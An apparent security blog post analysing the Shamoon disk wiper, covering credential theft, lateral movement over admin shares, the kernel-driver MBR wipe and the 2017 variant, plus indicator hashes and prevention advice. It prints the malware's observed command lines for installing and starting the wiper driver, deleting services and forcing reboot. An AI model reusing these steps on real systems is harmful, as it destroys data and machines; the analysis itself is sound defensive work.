Shamoon

udurrani

INFO

Shamoon for Dummies Click          Shamoon in Action Click

If you are hit by Shamoon, it simply means:

1- You have been compromised for a longer period in which the attacker was able to stay on the corporate network and gathered enough information about users, network, subnet range, shares, end-points, servers, services etc

2- You have been compromised multiple times without any knowledge of the attack. During each phase attacker only gathered information like key-strokes and eventually admin credentials

3- Shamoon / wiper requires admin credentials and attacker could achieve this by using a zero-day exploit for privilege escalation but that doesn't make a lot of sense as how the malware propagated and laterally moved so quickly within the network?

- Via USB??
- Via network share??
- Via zero day vulnerability running as a network service on all the machines??
- An insider’s job??
In any case, Attacker knew the credentials before the attack was launched. How did this work?

Attacker identified the target organization and ran reconnaissance to track important users, preferably ones with admin credentials. Once those user(s) were identified, attacker looked at their social media profiles to find out their job descriptions. Attacker launched the initial attack

- Key-logger malware as a binary to collect all key-strokes
- A macro / document that contained the payload for the key-logger to steal the credentials
- A zero day exploit that launched a persistent malware to collect admin credentials

 Let's call this PRE-SHAMOON phase. Without this stage attacker could not have had launched such a massive attack. Now that the adversary has all the information i.e. domain names, admin credentials the actual attack has to be put together. In-order to do this attacker has to statically embed credentials in the binary / malware. Challenge is that strings could be easily seen by string analysis. E.g

char *password = "Password@!2";
loginFunction(password);

If I compile this code and run strings command I would be able to see the credentials within the binary. To hide this attacker used a very simple technique



In all Shamoon 2 variants, value 0xed is used for encoding. it applies to every character in the string



This means each attack is specially crafted for a target organization

In-efficient??? Yes, but it does work perfectly

Intentiion

Intent of this malware is un-known but its definitely not to make money. Malware retrieves some data, followed by executing the code to overwrite data or the Master boot record. Nature of the malware also indicates that it could be related to cyber-espionage campaign(s). Its aiming for complete destruction

MBR is the very first sector of the disk i.e. 512 Bytes. Its normally placed there by the install process. This is the starting point of the disk, where important information about the disk and partition is stored. Some bootkits also modify MBR code to stay in control, which makes them very hard to detect. Let's look at the the MBR process


Linux MBR looks something like:



As I mentioned before, goal of Shamoon is to overwrite the MBR followed by a reboot. But let's take a look at what happens before the reboot

Shamoon has the following components

- Dropper
- Reporter
- Wiper
- Also it laterally jumps to other machines by using admin credentials

 The dropper begins by dropping a binary and making a service. Most of the binary names dropped in Shamoons life are very random. Different sizes, different hashes etc. Initially it uses createfile and createprocess functions to launch a binary



Normally a service is launched by using Microsoft windows 'SC' command



For a WORM (Write once read many), they are mostly blended with virus and malware code. Malware code to do the damage and exploit code to move laterally. The question is: how would it know if machine is already infected when its moving from one end-point to another? It can check the mutex, it can look at a specific service it started, it can look at loaded DLL’s, logical ports or just hidden files. Thats how a worm hopping from one machine to another can detect if machine is already infected. If not it will keep infecting in an infinite loop and infect machines again and again. In Shamoons case the payload is purely a malware. There are no signs of exploit code. Shamoon checks for the service before launching the final stage

Let's look at the service launched by Shamoon 1 in 2012



PING.exe was used to create a pause or delay instead of using a simple Sleep() that would call ntDeleyExecution() function. Shamooon 2 uses a different service name

Wiper is dropped and launched by using the following command

C:\Windows\system32\randomName.exe 1

It also create copuple of .pnf file that contains the time to initiate the wiper functionality. Normally its set to after work hours on a weekend

CreateFileW ( "C:\Windows\inf\dcT21x400i.pnf" .....)

Reporting

In Shamoon 1 a hardcoded ip was used for reporting i.e. every infected machine would send state information to the internal CnC. Think of this as a proxy pivot. Every machine informs the internal CnC, which eventually tunnels the information to the external CnC. The format was pretty straight forward



Where mydata = number of files deleted so far



In Shamooon 2 this proxy pivot did not matter, in some cases it was set to 1.1.1.1:80

Lateral movement

Is something you don't want on your corporate network. But for an attacker this is an ideal situation. In both cases it comes at its price. Attacker has to put in more effort and education behind the whole attack, while Defender has to prevent it before its too late. Even if the defender is capturing all the traffic, its still not as easy to watch all the subnets and their internal communication. I made a tool for my home and work network where I can profile all the traffic between internal machines. Its a small agent that works on windows, linux and mac and will notify any connection initiation. It tells you what machines are communicating to each other. Normally internal machines i.e. end-points should not talk to each other.

In Shamoon's case lateral movement could be done by using following techniques

- Exploitation
- Network shares
- Pass the hash
- Kerberos tokens
- Internal web server set up by the attacker Tools like PSExec or winrm etc
- RDP

Attacker wants to achieve the following

Delivery -> Payload (malware / Exploit) -> Persistence -> Stealth -> Lateral movement

For lateral movement Shamooon 2 used network shares, where the attacker already knew the credentials. Attacker had statically embedded the credentials in the malware. They were not passed as char pointers or strings but encrypted / encoded first and then embedded in the malware. NetUseAdd() and NetUseDel() functions can provide a way to add access to a network resource with network credentials. This will allow you to run the process from any user



Shamoon will first make sure if user has the default rights to do so without any credentials. If not it will try the statically embedded credentials. If this doesn't make any sense, then think of it as: your credentials have already been stolen and attacker is just using them where ever required. Shamoon can use NetUseGetInfo() to find if share is already in use. One can also use command line to do so

net use s: \\foo\fooFolder /user udurrani Password!@#$%^*&
net use * /Delete

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include ADMIN$, and IPC$

Adversaries may use this technique in conjunction with administrator-level Legitimate Credentials to remotely access a networked system over server message block to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task

It means Shamoon will copy itself to a remote share. At the same time it will schedule a task for execution. It requires admin credentials for all this to happen. Remember credentials have already been stolen!!!!

NetScheduleJobAdd && NetScheduleJobDel are used for task management.

To make sure everything is saved to c:\\windows\\system32 even on 64 bit system
Wow64DisableWow64FsRedirection() is used

Shamoon 2 will drop the file on a network share and create a service to initiate

Kill Time

After the launch, Shamoon waits for the kill time. This is the time where shamoon will drop the driver and starts wiping files and MBR. Once the time >= kill-time the driver is dropped and service is initiated



Service will run the following commands:

C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul
\cmd.exe /c sc delete vdsk911 2>&1 >nul
sc delete vdsk911

At this stage system time is changed i.e. reset to 2012. Wiper functionality relies on Eldos driver. Attacker is using an evaluation license key where the time MUST NOT exceed 8/2012 (License expiry date). To make sure everything works with the origanal eldos trial key, attacker resets the time



C:\Windows\system32\cmd.exe /c sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys 2>&1 >nul
sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys
C:\Windows\system32\cmd.exe /c sc start vdsk911 2>&1 >nul
sc start vdsk911
C:\Windows\system32\cmd.exe /c shutdown -r -f -t 2



After the reboot, Operating system is un-able to find the MBR i.e. no Operating system found

New Shamoon 2 Campaign 2017

Shamoon 2 had another successful campaign. During this campaign nothing much changed other than one important component. The driver used for all the attackes since 2012 never changed. During the latest campaign, attacker changed the driver (hash + size).





Other than that things are pretty similar to previous Shamoon 2 attack. Let's re-cap the new scenario very quickly

OpenServiceW (HANDLE, "NtertSrv" ...);

C:\Windows\system32\newtvsc.exe 1

cmd.exe /c sc stop vdsk911 2>&1 >nul

cmd.exe /c sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys 2>&1 >nul

C:\Windows\system32\sbuvideo.exe 1 (RandomName binary)

New variant using an internal CnC. Using socket calls to formulate HTTP request

WinHttpOpen ( "Mozilla/13.0 (MSIE 7.0; Windows NT 6.0)", WINHTTP_ACCESS_TYPE_NAMED_PROXY, "192.168.1.1:80", ...);

Later uses for HTTP

WinHttpConnect(...)



SPLITING THE OCTETS AND APPLYING NET BYTE ORDER

inet_ntoa ( { S_un = { S_un_b = { s_b1 = 172, s_b2 = 16, s_b3 = 177 ...}, S_un_w = { s_w1 = 4268, s_w2 = 177 }, S_addr = 11604140 } } )

SEQUENCE FOR NEW SHAMOON (2017)



C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul

C:\Windows\system32\cmd.exe /c sc delete vdsk911 2>&1 >nul

sc delete vdsk911

sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys

C:\Windows\system32\cmd.exe /c sc start vdsk911 2>&1 >nul

sc start vdsk911

sc delete vdsk911

C:\Windows\system32\caiaw00b.exe 1 (Binary name is random)

C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul

C:\Windows\system32\cniaw001.exe 1

CreateFileW ( "C:\Windows\inf\tyb6_s32.pnf" .....);

CreateFileW ( "C:\Windows\inf\tyb6_s32.pnf" .....);

GetDiskFreeSpaceW ( "C:\" ....);

CreateFileW ( "\\?\ElRawDisk\# ......" ....);

It Can cause NtDelayExection if != KILL-TIME

Sleep ( 120000 ) // 120 MS

FINAL SHUTDOWN COMMAND USING CreateProcess()

CreateProcessA ( "C:\Windows\system32\cmd.exe", "C:\Windows\system32\cmd.exe /c shutdown -r -f -t 2" ...);


NOTE


Please note that there were some other incidents on the same day but were not related to Shamoon campaign directly. Some of them were using NetWire RAT and some were using Ransomeware. Ransomeware was able to move laterally using PSEXEC and was able to destroy multiple servers. Sample was using RC4 encryption with the key statically embedded in the payload



PSEXEC is saved as a randomName e.g. control.exe or move.exe


Finally everything is converted to .zXz extension and final page has all the ransome information i.e. zXz.html (No financial motive)
*eax = *"\zXz.html";


NetWire RAT (.net binaries)


DNS


TCP


PLEASE NOTE THAT ABOVE TWO INCIDENTS WERE NOT SHAMOON VARIANTS, HOWEVER RANSOMEWARE MOTIVE WAS SIMILAR



Prevention

They say Prevention is better than cure. Its good if the attack is prevented in PRE-SHAMOON phase. Once the credentials are leaked, it becomes very difficult to prevent such attacks. In the next phase of Shamoon attacks the attacker may target the security products running in the corporate network E.g. tamper with the end-point or network security. If you lose all the keys to your network, its already too late. By the time you realize what hit you, it maybe too late.

Most of the targeted attacks are not as easy to detect and no security product is 100%. Its good to have multiple layers of security in place. one can always develop some simple in-house tools to automate such detections.

In Shamoon's life cycle size, name and hash keeps changing

Some of the hashes old and new

47BB36CD2832A18B5AE951CF5A7D44FBA6D8F5DCA0A372392D40F51D1FE1AC34
113525C6BEA55FA2A2C6CF406184092D743F9D099535923A12CDD9B9192009C4
7D71DAB090E367847B9AB839A6242AF6BD6362A3A84A501ABBEBC2F2C0EF4B05
394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b
772ceedbc2cacf7b16ae967de310350e42aa47e5cef19f4423220d41501d86a5
61C1C8FC8B268127751AC565ED4ABD6BDAB8D2D0F2FF6074291B2D54B0228842
c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a
128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd
EFD2F4C3FE4E9F2C9AC680A9C670CCA378CEF6B8776F2362ED278317BFB1FCA8
5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a (Driver: 2012 and 2016)
AA6C7C2AD6D0D961196EDABA7B5BB7A930D9CB850AA69ABEE02C9C0479F97E86 (Driver: 2017)
113525C6BEA55FA2A2C6CF406184092D743F9D099535923A12CDD9B9192009C4
F9D94C5DE86AA170384F1E2E71D95EC373536899CB7985633D3ECFDB67AF0F72
4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6
4F02A9FCD2DEB3936EDE8FF009BD08662BDB1F365C0F4A78B3757A98C2F40400
DBDEA08E7B970D395236B8E0AADA6FC07FB23E6181485D86F65DA1E73AB2BA2E
EE3F56DF45F2D60E73894B063A2CCC15E940D8D53497788B6EC8C416312AD7C0
69880af5d0daa1fb4ddd704e5ee77cb16f7c7521e3826554e62b2e4fba6a8e87

Hash in red is the actual driver file and it remained the same in all Shamoon attacks, starting 2012. Even the latest ones are using the same driver. Its a good indicator. So please look up your drivers folder for this hash and size (31632 Bytes)

- Make sure you look for the driver file. Search by using file size and hash
- String check is not a bad idea as well E.g.
     Distributed Link Tracking Server
     Enables the Distributed Link Tracking Client service within the same domain to provide more reliable and efficient maintenance of links within the domain. If this service is disabled, any services that explicitly depend on it will fail to start
- Products enabled with big data analytics and AI component are good to detect such things
- Signature check via AV
- Disable applications running directly from USB
- Disable applications running directly from network folders
- Network segregation
- Dual factor auth to access privileged domain accounts is not a bad idea
- Some companies enable jump servers to access important control machines
- Profile your internal machines i.e. end-points and servers, I developed a tool to profile end-points and servers on my network. You can take a look

CLICK FOR MORE INFORMATION ON PROFILER
PROFILER QUICK VIDEO    

- Introduce a good exploit protection on your end-points
- Make sure you watch all the alerts / events. In Shamoons case there was an incident before the actual Shamoon happened, meaning some one already stole your credentials. So pay attention to things like key-loggers, brute force attacks
- Domain admin should have limited accounts and they should change passwords frequently
- Encrypt and backup your MBR
- Last but not least, hire people who understand security. Its easy to buy all the fancy products ( if you got the money :-) ) but at the end of the day you need your team to take advantage of those products

Tool to identify shamoon driver and some forensics (PASSWD: foo), please CLICK HERE RUN AS ADMIN
This tool is not 100%. It tries to identify Shamoon and also provides forensics. Look for shm.html and make sure there are no orange or red rows. Also there are multiple files that can give you more forensic data. d_warn.txt will look for specific signatures. If its empty no signatures were found.

Conclusion

I won't get into the actual motive or politics of the attack but thousands of machines (end-points and servers) were destroyed during this campaign. It also became clear that targeted campaigns are often successful. Targeted attacks are developed over the period of months if not years and are heavily tested against security products. Some say Shamoon was poorly written with in-efficient code. I don’t think it matters in such cases. The only thing that matters is the actual outcome. To end on a positive note, such attacks can be stopped with the right mix of technology and the skill set.

Shamoon Summary